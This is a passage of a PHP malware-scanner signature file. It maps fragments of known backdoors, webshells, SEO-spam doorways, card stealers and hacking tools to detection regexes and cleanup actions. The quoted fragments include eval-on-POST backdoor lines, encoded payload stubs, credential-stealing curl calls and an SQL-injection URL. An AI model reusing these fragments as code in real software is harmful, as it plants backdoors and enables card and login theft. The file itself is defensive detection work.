			'preg_replace("\x23\50\x2e\53\x29\43\x69\145",' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.023', '\$cookey\s*=\s*.\w{10,}.;[^>]+preg_replace...x23.50.x2e.53.x29.43.x69.145[^;]+\);'),
		),
	
		';preg_replace("/.*/".\'e\',chr(101).chr(118).chr(97).chr(108).chr(40).chr(103)' => array(STR_CLEARFILE, 'php.backdoor.filesman.001.014', NULL),
		'preg_replace(\'\\\'a\\\'eis\',\'e\'.\'v\'.\'a\'.\'l\'.\'(' => array(STR_CLEARFILE, 'php.backdoor.ghostshell.002', NULL),
		'str_replace(\'[-code-]\',$__gp->out,preg_replace' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.gp_shell.001.02','global .__gp;[\\s]*.data=str_replace...-code-..,.__gp->out,preg_replace..~.<body...<>...>.~is.,..1.-code-..,.data..;'),
		'_sessions_debug_data = base64_decode(preg_replace(array' => array(STR_CLEARFILE,'php.backdoor.uploader.022', 'if\(md5\(reset\(\$_COOKIE\)\)==[^\{]+\{[\s]*\$_sessions_debug_data[\s]*=[\s]*base64_decode\(preg[^}]+echo[^;]+;[\s]*unlink\(\$[^;]+\);'),
		'if (!function_exists("b_call")) {' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.031', 'if[\s]*\(\!function_exists\("b_call"\)\)[^\?]+(\?p[^\?]+)?add_action\([^\)]+b_end.\);[\s]*\}'),
		'preg_replace($exif[\'Make\']' => array(STR_CLEAR_MULTIMATCH, 'php.malware.exif_read.001', '.exif = exif_read_data[^><]*preg_replace..exif[^><;]*;'),
		'@preg_replace($exif' => array(STR_CLEAR_MULTIMATCH,'php.malware.exif_read.001.03', '..Parse the images logo[\\s]*if[\\s]*.function_exists..exif_read_data...[\\s]*\\{[\\s]*\\$exif = exif_read_data..images.joomla_logo_black.jpg..;[\\s]*.preg_replace..exif[^}]+;}'),
		'preg_replace("/B8Ra=QZ6J1FyUNgda6cIu7kF/e"' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.038', 'preg_replace...B8Ra=QZ6J1FyUNgda6cIu7kF[^;]*;'),
		'$Foxgo->fullURL=$Foxgo->translateServer' => array(STR_CLEARFILE, 'php.spam-seo.foxgo.001', NULL),
		'echo \'walex\';' => array(STR_CLEARFILE, 'php.backdoor.filesman.011', NULL),
		'gzuncompress(@$vlm(@sdec' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.sdec.001', 'function sdec.\$\w+\) \{\s*\$key.+?if.substr.md5.reset.._COOKIE\)\),.+?print...x3c[^\<)]+\);\s*\}'),
		'gzuncompress(base64_decode(\'eJzT1' => array(STR_CLEAR_MULTIMATCH, 'php.malware.letcaro_x24hr.002', 'function wp_scripts_method.. \{\s*wp_enqueue_script\([^\)]+gzuncompress.base64_decode..eJzT1[^\}]+\}|add_action.\s*.wp_enqueue_scripts.,\s*.wp_scripts_method..;'),
		'"bot")===false || $cloakornotcloak=="no"' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.009', NULL),
		'$htmls = preg_replace("/<\/body>/i","<a href=\"http:' => array(STR_CLEARFILE, 'php.spam-seo.injector.099', NULL),
		'preg_replace("/s2ylW0wUhSexgWjoGt=Q/e' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.020', 'preg_replace.".s2ylW0wUhSexgWjoGt=Q.e[^>]+Gt=Q".;'),

	),

	'${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x' => array(STR_TRIGGER,

		'str_ireplac' => array(STR_CHAIN_TRIGGER,
			'{function str_ireplace($from,$to,$string){return trim' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.046.04', '(\$[\w]{3,40}[\s]*=[^;]+;+[\s]*)+(\s*\$[\w]+=[^;]+;)+[^\x02]+(\]\(\);[\s]*(?=\?>)|return array_slice\([^;]+\);[\s]*\}|";(?=\?>))'),
			'//header(\'Content-Type:text' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.046.10', '\/\/header\(.Content-Type:[\s]*text.html;[\s]*charset[^;]+;'),
		),

		'_INJECTED' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.046.07', '\$[0O_]+=urldecode\("%6E1%7A[^\x02]+_INJECTED[^>]+x[\a-zA-Z0-9]{2}"\]\(\);'),
		'if(is_numeric($_GET[\\\'sitemap_num\\\']))' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.046.09', '(\$[0O_]{3,50}[\s]*=[^;]+;+[\s]*){3,}[^#]+function get_arr\(\$[^}]+return rang[^}]+\}[^}]+array_slice[^;]+\);[\s]*}'),
		'=implode("",array_reverse($' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.026', NULL),
		'if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x53\x43\x48\x45\x4d\x45' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.046.12', '(\$[0O_]+)\s*=\s*.\w+.\s*;\s*\$[0O_]+\s*=\s*\([^\1]+\1,\s*\${[\'"].x47.x4c.x4f.x42.x41.x4c.x53[\'"]\s*}\s*\[[\'"][\\x4f305f]+[\'"]\s*\]\s*\(\${[\'"].x47.x4c.x4f.x42.x41.x4c.x53[\'"]}[^\2]+exit\(\)\s*;\s*}\s*}[\'"]\)\s*;\s*\${[\'"].x47.x4c.x4f.x42.x41.x4c.x53[\'"]}\s*\[[\'"][\\x4f305f]+[\'"]\]\s*\(\)\s*;'),
	),

	'explode' => array(STR_TRIGGER,

		'yumingid' => array(STR_TRIGGER,
			'lineid' => array(STR_TRIGGER,

				'x5' => array(STR_TRIGGER,
					'@\'$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.046', '@\'\$[\s]*\$?[\w]+=[^\x02]+(\/\/\*\/|}}[\w]+\(\);)'),
				),

				'$urlrules' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.046.02', '<\?php[\s]*\$yumingid[\s]*=[\s]*[\d]+;[\s]*\$lineid[\s]*=[\s]*[\d]+;[^~]+((return \$randstring;[\s]*\}[\s]*)|(return \$[\w]+;[\s]*\}[\s]*)|(@chmod\(\$[\w]+,[\s]*[\d]+\);[\s]*\}[\s]*))\?>'),
				'/junchi.php?yid=%d&lid=%d&jumpurl=%d' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.046.05', '<\?(?:php)?(?:\s*?\$\w+?\s*?=\s*?\d+?\s*?;){2}[^=]+?=.https?:\/\/[^\/]+?\/junchi\.php\?yid=%d&lid=%d&jumpurl=%d[^;]+?;(?:[^=]+?=){2,6}\s*?array\([^\0]+((return \$randstring;[\s]*\}[\s]*)|(return \$[\w]+;\}[\s]*)|(@chmod\(\$[\w]+,[\s]*[\d]+\);[\s]*\}[\s]*))(?:\?>)?'),
			),
		),

		'!=\'\'?preg_replace(sprintf("/^%s\/\??/si",' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.046.06', '(\$[\w]+[\s]*=(\d+|""|\'\');[\s]*){0,}\$[\w]+[\s]*=[\'"]http[^\'"]+[\'"];|[^\x02]+return \$[\w]+;[\s]*\}'),
		'$links = explode(\'|||\', trim(base64_decode(\'aHR0cDovL' => array(STR_CLEARFILE, 'php.redirect.header_location.028', NULL),
	),

	'($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$' => array(STR_TRIGGER,
		'if($is_bot){echo "' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.injector.046', '.stop_ips_masks = array.[^;]+".;[\\s]*.is_bot = false;[\\s]*.stop_agents_masks[^>]+if..is_bot..echo "[^;]+";} else[\\s]*.echo " " ;}'),
		'@base64_decode("PHNjcmlwdD5kb2N1bWVudC53cml0ZWxuK' => array(STR_CLEARFILE, 'php.spam-seo.injector.046.02', NULL),
		'{@require_once\'' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.046.03', '\$\w+\s*=\s*array\(\s*[\'"]\d+.\.\d+.\.(\[\d+-\d+\]|\d+)+.\.(\[\d+-\d+\]|\d+)+(\+)?[\'"],\s*[\'"]\d+.\.\d+.\.[^;]+;\s*\$\w+\s*=\s*false;\s*\$\w+\s*=\s*array\([(",\s*httpgoogleslurpmsnbotcrawlerspider(Hh)ttp(Cc)lientPHPIndyLibrary(Ww)ordpress)]+;\s*\$_SERVER\[[\'"]HTTP_USER_AGENT[\'"]\]\s*=\s*preg_replace\("\|[Uu]ser\.[Aa]gent[^@]+\@\$_SERVER\[.HTTP_USER_AGENT.\]\)\s*;\s*foreach\s*\(\$\w+\s*as\s*\$\w+\)\s*if\(eregi\([^\)]+\)\)\s*\$\w+\s*=\s*true\s*;\s*foreach\s*\(\$\w+\s*as\s*\$\w+\)\s*if\(eregi\(\$\w+,\s*\@\$_SERVER\[.HTTP_USER_AGENT.\]\)\s*\!==\s*false\)\s*\$\w+\s*=\s*true[^{]+{\s*echo\s*[\'"]\s*[\'"]\s*;\s*}\s*else\s*{\@require_once[\'"]\w+\.php[\'"]\s*;\s*}'),
	),

	'if (preg_match($regex, $USER_AGENT)' => array(STR_TRIGGER,
		'return $BROWSER_ERROR' => array(STR_CLEARFILE, 'php.malware.browsercheck.001', NULL),
	),

	'preg_replace("/(.*)/e",' => array(STR_TRIGGER,
		'preg_replace("/(.*)/e", stripslashes(@$_POST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_preg_replace.002', '@?preg_replace\(..\(\.\*\).e.,\s*stripslashes\(@?\$_POST\[.\w+.\]\),\s*..\);'),
	),

	'if (isset($_REQUEST[\'action\']) && isset($_REQUEST[\'password\']) && ($_REQUEST[\'password\'] ==' => array(STR_TRIGGER,
		'if (preg_match(\'!<div id="wp_cd_code">(.*?)<' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.wp_cd.001', 'if[\s]*.isset\(\$_REQUEST..action.\]\) \&& isset\(\$_REQUEST..password....&&..._REQUEST..password...==..[\w]{10}[^\)]+\)\)[\s]*\{[\s]*switch[\s]*\(\$_REQUEST..action.\]\)[\s]*\{[\s]*case[\s]*.get_all_links.;[\s]*foreach[\s]*\(\$wpdb->get_result[^!]+preg_match...<div id=.wp_cd_code[^@]+get_sidebar\(\);[\s]*get_footer\(\);[\s]*}[\s]*exit;[\s]*}'), //modified by PG type1 -> type4: RESEARCH-9532
	),

	'${$' => array(STR_TRIGGER,
		'])) preg_replace(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_preg_replace.003', '(\$\w+) *= *[\'"_. GETPOSCKIRQU]+; *if \((?:!empty|isset)\( *\$\{\1\}\[[^;]+preg_replace[^;]+;'),
	),

	')));",".");' => array(STR_TRIGGER,
		'preg_replace("/./\x65","\x65\x76\x61\x6c(gzinflate(urldecode(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.WSO.009', 'preg_replace\(.....x65[^;]+;.,.\..\);'),
	),

	' @preg_replace(\'/(.*)/e\', @$_POST[' => array(STR_TRIGGER,
		' @preg_replace(\'/(.*)/e\', @$_POST[\'' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.generic.024', '\@preg_replace..\/\(..\)\/e., \@\$_POST..\w+.., ..\);'),
	),

	'@preg_replace("/([a-z0-9-%]+).([a-z-@]+).([a-z]+)/\x65", "$2($3(urldecode(\'$1\')))' => array(STR_CLEARFILE, 'php.backdoor.WSO.005', NULL),
	'echo preg_replace("/<script.*?<\/script>/si", \'\', $homepage_content);' => array(STR_CLEARFILE, 'php.spam-seo.injector.116', NULL),
	'@preg_replace("/[checksql]/e",$_POST[\'date\'],"saft"); ' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.021', NULL),
	'<\?php[\s]*@?preg_replace\s*\(\s*[^,]+?\/[^,]+?\/e[^,]+?,\s*\$_' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.pregreplace.021', '@?preg_replace\s*\(\s*[^,]+?\/[^,]+?\/e[^,]+?,\s*\$_\w+[^\)]+?\)\s*;?'),
	'preg_replace($_POST[\'v1\'], $_POST[\'v2\'], $_POST[\'v3\']);'=> array(STR_CLEARFILE, 'php.backdoor.eval_POST.003', NULL),
	'preg_replace(\'//e\',\'e\'.\'v\'.\'al($a)\',\'\');' => array(STR_CLEARFILE, 'php.backdoor.generic.030', NULL),
	'newfilecontents = preg_replace(\'#<\?php /\*startdel' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.eval_POST.017', '..startdel..[^;]+_POST..newcontents[^>]+>#s[^>]+stopdel..[\\s]*'),
	'join("\x0A", array("' => array(STR_CLEARFILE, 'php.backdoor.uploader.023', NULL),
	'/e", "ev"."al(\'".$_REQUEST' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.015', 'preg_replace\(\s*"\/[^"\/]+\/e", "ev"."al\(."\.._REQUEST.[^;]+\);'),
	'<p>FATT has cleaned up and removed itself.</p>' => array(STR_CLEARFILE, 'php.hacktool.FATT.001', NULL),
	'preg_replace("/./\x65",stripslashes(@$_POST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.preg_replace_POST.002', 'preg_replace\(.....x65.,stripslashes\(@\$_POST\[[^\]]+\]\)[^;]+;'),
	'By Benladen Crazy C0d3' => array(STR_CLEARFILE, 'php.phishing.mailer.041', NULL),
	'e",base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9T' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.057', 'preg_replace\([^,]+e.,base64_decode[^;]+\);'),
	'{if(empty($input))return;$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$chr1 = $chr2 = $chr3 = "";' => array(STR_CLEARFILE, 'php.backdoor.webshell.143', NULL),
	'$returnVal=str_replace_once("$",chr(rand(' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.046.03', NULL),
	'e", "=JojrOlmLLn6KY' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.059', 'preg_replace...[^,]+e.,[\\s]*[\'"][^^]+\\^[^;]+\\);'),
	'$url = ( preg_match(\'/^[a-z2-7]+$/\', $_SERVER[\'QUERY_STRING\'])' => array(STR_CLEARFILE, 'php.spam-seo.redirect.029', NULL),
	'$tmp=getlinks($googlelinks,$links);' => array(STR_CLEARFILE, 'php.spam-seo.injector.138', NULL),
),

'CURL' => array(STR_TRIGGER,

	'google' => array(STR_TRIGGER,

		'else if(strpos($tmp, \'yahoo\') !== false){' => array(STR_TRIGGER,
			'if(strpos($sitename, \'www\') == false)' => array(STR_TRIGGER,
				'.str_replace(" ","-",$_GET["p"]);' => array(STR_CLEARFILE, 'php.spam-seo.injector.286', NULL),
			),
		),

		'if(strpos($url,\'google\')>0||' => array(STR_TRIGGER,
			'echo "<script>document.location=\'/\';</script>' => array(STR_CLEARFILE, 'php.malware.redirect.005', NULL),
		),

		'CURLOPT_REFERER, "http://www.googlebot.com/bot.html"' => array(STR_TRIGGER,
			'if(stristr($reqstr,"jquery")==false && stristr($reqstr,"ckeditor")==false' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.025', NULL),
		),

		', "php")) AND (!strpos(' => array(STR_TRIGGER,
			'(str_word_count($a)>3) echo $a."<br>";' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.047', NULL),
		),

		'google.com/search' => array(STR_TRIGGER,
			'mb_strtolower($query_pars_2);' => array(STR_CLEARFILE, 'php.spam-seo.injector.315', NULL),
		),

		'echo \'google-site-verification: google\'.$_GET[\'google\'].\'.html\';exit;' => array(STR_CLEARFILE, 'php.spam-seo.google_verification.005', NULL),
		'googleResult[$victim' => array(STR_CLEARFILE, 'php.hacktool.dork_scanner.001', NULL),
		'gethostbyaddr($_SERVER["REMOTE_ADDR"]), "google"))' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.009', '\$user_agent_to_filter[\s]*=[\s]*array\([^;]+[^}]+-NO-WAY-["\'][\s]*\)[\s]*\)[\s]*\)[\s]*\{[\s]*\$isbot[^>]+echo \$result;[\s]*}'),

	),

	'CURLOPT_POST, true);' => array(STR_TRIGGER,

		'function getRealref()' => array(STR_CHAIN_TRIGGER,
			'function getRealua()' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.102', '(\$[\w]+[\s]*=[\s]*[\'"][^\'"]*[\'"];[\s]*)*\$flowdomain[\s]*=[^:]+https?:[^;]+\);[\s]*curl_[^\?]+echo[\s]*\'?(\$code;|\'<!DOCTYPE[^\x02]+<.html>\';|\';)[\s]*\}?'),
			'@session_start();' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.102.02', '@session_start\(\);'),
			'error_reporting(0);' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.102.03', 'error_reporting\(0\);'),
		),

		'array(\'file\'=>"@$uploadfile' => array(STR_TRIGGER,
			'$ch = curl_init("http://finditinhaubstadt.com' => array(STR_CLEARFILE, 'php.backdoor.curl.007', NULL),
		),

		'], 0775) or die' => array(STR_TRIGGER,
			'= fopen($_POST[\'folder\']."/".$url.".txt","w");' => array(STR_CLEARFILE, 'php.backdoor.uploader.129', NULL),
		),

		'print "$postResult";' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.curl.008', '\$(site|uploadfile)[\s]*=[^;]+;[^\(]+curl_init[^<]+print[\s]*.\$postResult.;'),
		'$hasil' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.curl.008.02', '(?:echo\s*["\']<title>[^;]+?;\s*)?(?:\$site\s*=[^;]+?;\s*)?\$agent\s*=[^\$]+?\$[^C]+?CURLOPT_[^;]+?;\s*(?:curl_setopt[^;]+?;\s*){1,10}\$hasil\s*=\s*curl_exec[^;]+?;\s*(?:\w+\s*["\']?\$hasil["\']?;\s*)?curl_close[^;]+?;'),
		'CURLOPT_POSTFIELDS, "payment="' => array(STR_CLEARFILE, 'php.malware.cc_stealer.007', NULL),
	),
	
	'curl_exec($' => array(STR_TRIGGER,

		'add_action(' => array(STR_TRIGGER,

			'echo $' => array(STR_TRIGGER,
				'CURLOPT_URL, "http' => array(STR_TRIGGER,
					'str_replace(' => array(STR_TRIGGER,
						'function bot($res)' => array(STR_CLEARFILE, 'php.malware.curl.031', NULL),
					),
				),
			),

			'strrev(' => array(STR_TRIGGER,
				',$_POST);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.wp_login_stealer.004', 'add_action\([\s]*.wp_authenticate.,[^\{]+\{[\s]*if\(empty\(\$[^;]+return;[\s]*\$[\w]+[\s]*=[\s]*strrev\([^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*array\([\s]*CURLOPT_[^;]+\);[\s]*if[\s]*\(\$[\w]+\)[\s]*\{[\s]*\$[\w]+\[CURLOPT_POST\][^\}]+\}[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\$[\w]+\);[^\}]+\}[\s]*\$_POST\[.HTTP_HOST.\][\s]*=[\s]*\$_SERVER\[.HTTP_HOST.];[\s]*@[\w]+\(\$[^;]+\$_POST\);[\s]*\}'),
			),
		),

		'\'1337' => array(STR_TRIGGER,
			'naem' => array(STR_TRIGGER,
				'base64_encode(json_encode(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.117', '(\$naem|\$ok|\$addr)[\s]*=[\s]*[^;]+;|\$url[\s]*=[\s]*.https?:..[\d]+[^;]+;|\$ch[\s]*=[\s]*curl_init[^;]+\);[\s]*(curl_[^;]+\);[\s]*)+'),
			),
		),

		'cloakedCurl' => array(STR_TRIGGER,
			'if(empty($CLOAKING[' => array(STR_CLEARFILE, 'php.spam-seo.link_cloaking.002', NULL),
		),
		
		'curl_init(base64_decode(\'' => array(STR_TRIGGER,
			'urlencode($HTTP_POST_VARS[\'authorizenet_cc_number\']).\'&' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.023', '\$\w+=\$\w+->billing\[\'country\'\]\[\'title\'\];\s+if\(\$\w+==\'United States\'\)\{\$\w+=\'US\';.\}\s+elseif[^@]*\@\$\w+=curl_init\(base64_decode\(\'[^\']*\'\)\.\s+urlencode\(\$HTTP_POST_VARS\[\'authorizenet_cc_number\'\]\)\.\'\&\w+=\'\.\$HTTP_POST_VARS[^;]*;\s+curl_setopt[^;]*;\s+curl[^;]*;.WOW64[^;]*;\s+(.curl_setopt[^;]*;\s+){2}(curl_setopt[^;]*;\s+){1,6}curl_exec\(\$\w+\);.\@curl_close\(\$\w+\);'),
		),

		'.$this->common_vars["billing_address"]["value"].' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.010', 'function[\s]*[\w]*\(\$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\);[\s]*\$[\w]+[\s]*=[\s]*[^\}]+curl_close\(\$[\w]+\);[\s]*return[\s]*\$[\w]+;[\s]*\}[\s]*\$[\w]+[\s]*=[\s]*[\w]+\(.http[^\$]+\$[\w]+\[.cc_first_name.\][^\*]+\[.\].\)\);'),
		'echo trim($u["$index"]);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector_gen.036', '\$[\w]+[\s]*=[\s]*.http[^;]+;[\s]*\$[\w]+[\s]*=[\s]*curl[^\}]+echo trim\(\$[\w]+\[.\$index.\]\);[\s]*\}'),
	),

	'"\/index\/\?[\d]{8}' => array(REX_TRIGGER,
	
		'if(!$_COOKIE[' => array(STR_TRIGGER,
			'= "http://".$domain.$path;' => array(STR_CLEARFILE, 'php.spam-seo.crypper.001', NULL),
			'}if(!$_COOKIE[base64_decode' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.crypper.004', '\$[\w]+[\s]*=[\s]*[\'"]\/index\/\?[\d]+[\'"];[\s]*\$[\w]+[\s]*=md5\(\$[\w]+\);\$[\w]+=time\(\);[^@]+@fopen[^@]+=@fopen\(\$[\w]+,base64_decode\([^{]+\{setcookie\(base64_decode[^}]+\);\}'),
			
		),
	
		'$string = \'<script type="text/javascript">\';' => array(STR_TRIGGER,
			'$referer = isset($_SERVER[\'HTTP_REFERER\']) ? $_SERVER[\'HTTP_REFERER\'] :' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.crypper.002', 'function ([\w]+)\(\)[\s]*\{[\s]*echo \'<script[^\|]+\$referer,[\s]*.google[^}]+\$redirecturl\);[\}\s]+\1\(\);'),
		),
	),

	'&testcookie=1' => array(STR_TRIGGER,
		'Wordpress Brute Force Tool' => array(STR_CLEARFILE, 'php.hacktool.wordpress_bruteforce.001', NULL),
		'$data[$i] = array(\'url\' => $link[0], \'post\' => \'log=\'.$link[1].\'&pwd=\'.$link[2].\'&testcookie=1&wp-submit=1&redirect_to=\'.$redirect_to);' => array(STR_CLEARFILE, 'php.hacktool.wordpress_bruteforce.002', NULL),
		'la_brute($url, $username, $wordlist, $thread, $log)' => array(STR_CLEARFILE, 'php.hacktool.wordpress_bruteforce.003', NULL),
	),

	'function GetHttpPage' => array(STR_TRIGGER,
		'$errstr . "--->"' => array(STR_TRIGGER,
			'$jumpdomain = GetHttpPage($jpdomain);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.094', '<\?php\s*error_reporting . 0 .;\s*\$jpdomain=.http:[^;]*;\s*\$desurl=[^\?]*\?"[^\?]*header..Location: ...jumpdomain.;\s*exit;\s*\}\s*\}\s*\?>'),
			'header(\'Location: \' . $jump);exit();' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.094.02', '<\?php\s*if..function_exists..stripos[^\}]+\}\s*\}\s*function GetHttpPage..url\)[^-]+"--->" \.[^\}]+\}[^\?]+\? \$_SERVER[^\?]+\$jump\);exit..;\s*\}\s*\}\s*\}\s*\?>'),
		),
	),

	'preg_replace' => array(STR_TRIGGER,
		'drupal_get_urlsc_callback_url' => array(STR_CLEARFILE, 'php.spam-seo.drupal_doorway.001', NULL),
		'function createBrutePass($wordsList, $domain, $login, $startPass, $endPass)' => array(STR_CLEARFILE, 'php.backdoor.wp_worm.003', NULL),
	),

	'function getlinks($arrUrl,$links)' => array(STR_TRIGGER,
		'function isCrawler()' => array(STR_TRIGGER,
			"link .= '<li><a href=\"http://'" => array(STR_CLEARFILE, 'php.spam-seo.link_injector.002', NULL),
		),
	),

	'go(.*)enen' => array(STR_TRIGGER,
		'$ya = base64_decode(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.frmtmp_uploader.003', '\@ini_set..display_errors.. .0..;[^;]+;\s*if .ini_get..allow_url_fopen... \{\s*function get_data_ya[^\']+?\$ya = base64_decode[^\@]+\@unlink."\{\$eb\}[^\)]+\);'),
	),

	'(!empty($_POST["login"])) {' => array(STR_TRIGGER,
		'$vars = "url=".$_SERVER["HTTP_REFERER"]."&login=".$_POST["login"]["username"' => array(STR_CLEAR_MULTIMATCH, 'php.malware.dropper.001.02', 'if[\\s]*\\(!empty\\(\\$_POST\\["[\\w]+\"\\]\\)\\) \\{[\\s]*\\$vars = "url=..\\$_SERVER[^}]+curl_exec\\([\\s]*\\$[\\w]+[\\s]*\\);[\\s]*\\}'),
	),

	'@chmod($' => array(STR_TRIGGER,
		'>file $values is empty!</div><br/>' => array(STR_CLEARFILE, 'php.backdoor.uploader.111', NULL),
	),

	'PRENAME' => array(STR_TRIGGER,
		'define("DOMTXT","http://' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.024', NULL),
	),

	'botvsbrowser.com/rch_pdf/show.php' => array(STR_TRIGGER,
		'return; // Silence gold !' => array(STR_CLEARFILE, 'php.spam-seo.injector.144', NULL),
	),

	'function isspider()' => array(STR_TRIGGER,
		'<sitemapindex' => array(STR_CLEARFILE, 'php.spam-seo.sitemap_doorway.001', NULL), 
	),

	'$pro_param = isset($_GET["pro_param"])?$_GET["pro_param"]:"";' => array(STR_TRIGGER, 
		'$out = str_replace(\'[##jumpcode##]\', $jumpcode, $out);' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.doorway_downloader.012', '(?:\/\/header."Content-Type:text.html;charset=EUC-JP".;\s*)?\$pro_param = isset.._GET."pro_param"...._GET."pro_param".:"";[^[]+\$_GET."file"....".txt";.+?\$template =[^#]+\$out = str_replace...##name##[^}]+echo .out;\s*(?:\}|return;\s*}\s*other:)'),
	), 

	'cpanel_check' => array(STR_TRIGGER,
		'$cracktype=$_REQUEST[\'cracktype\'];' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.001', NULL),
	),

	'mail($' => array(STR_TRIGGER,
		'\'x_card_code\' => urlencode($x_card_code),' => array(STR_CLEARFILE, 'php.malware.cc_stealer.004', NULL),
	),

	'CURLOPT_URL, "http://aljyyosh.org/single.php"' => array(STR_CLEARFILE, 'php.hacktool.deface_auto_notifier.001', NULL),
	'CURLOPT_USERAGENT, \'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2\'' => array(STR_CLEARFILE, 'php.backdoor.curl.006', NULL),
	'$user_agent = "ConBot";' => array(STR_CLEARFILE, 'php.malware.ConBot.001', NULL),
	'$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component")' => array(STR_CLEARFILE, 'php.hacktool.simpleimageupload_exploit.001', NULL),
	'$sites = array_map("site", bing("ip:' => array(STR_CLEARFILE, 'php.hacktool.bing_scanner.001', NULL),
	'if (!class_exists(\'CCTM_Communicator\')) {' => array(STR_CLEARFILE, 'php.backdoor.wordpresscore.003', NULL),
	'"/viewticket.php?tid[sqltype]=TABLEJOIN&tid[value]=-1%20union' => array(STR_CLEARFILE, 'php.hacktool.whmcsexp.001', NULL),
	'DIRECTORY_SEPARATOR.\'it.php\',\'<?php  echo "test_is_test"; ?>\');' => array(STR_CLEARFILE, 'php.backdoor.backdoor_installer.006', NULL),
	'<title>Checker By CodSec<' => array(STR_CLEARFILE, 'php.hacktool.checker_codsec.001', NULL),
	'$enced=base64_decode($enced);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.enced.001', '(?<=<\?php\s)\s*\/\*\s*function.e,t..function l.e,n,r.+?\*\/\$enced=.ICY[^\}]+\}return .res;\}[^\}]+?\}if.function[^\}]+?\}\/\*\[\].+?--\s*\*\/'),
	'$Remote_server."/Parasite?host=".$host_name);' => array(STR_CLEARFILE, 'php.backdoor.uploader.147', NULL),
	'fopen(\'not_gmail.txt\', \'a+\');' => array(STR_CLEARFILE, 'php.hacktool.gmailverify.001', NULL),
	'function[\s]*[\w]+\(\$[\w]+\)\{[^\}]+\}[\s]*\$[\w][\s]*=[\s]*get_contents\(.http[^;]+\);[\s]*eval\(.\?>.\.\$[\w]*\);' => array(REX_CLEARFILE,'php.backdoor.webshell_gen.41', NULL),
	'substr($_SERVER[\'REQUEST_URI\'], strlen($pathToDor));' => array(STR_CLEARFILE, 'php.spam-seo.seodor_biz.001', NULL),
	'".str_replace(" ","+",$_GET["' => array(STR_CLEARFILE, 'php.spam-seo.injector.051', NULL),
	'if(strpos("qqq ".$thisdoorfilename, "?com=botdetected")){' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.006', NULL),
),

'__FILE__' => array(STR_TRIGGER,

	'$_F=__FILE__;$_X' => array(STR_TRIGGER,

		'XH' => array(STR_TRIGGER,
			'$_F=__FILE__;$_X=\'Pz48P3BocCA'=> array(STR_CLEAR_LINEMATCH,  'php.backdoor.beandoor.001', '\$_F=__FILE__;\$_X=.Pz48P3BocCA[^<>]+?eval\([^;]+;'),
